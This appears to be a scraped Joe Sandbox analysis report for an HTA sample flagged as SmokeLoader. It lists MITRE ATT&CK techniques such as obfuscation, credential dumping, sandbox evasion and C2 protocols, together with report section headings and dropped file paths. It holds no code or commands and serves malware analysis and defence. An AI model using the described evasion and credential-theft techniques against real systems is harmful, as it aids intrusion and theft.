Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_da97e819-8219-46df-9a77-93ea3c16a62d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER503D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5203.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5243.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\djvbaae.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestnetworkwhichgivebestthingsentirelifewithme[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre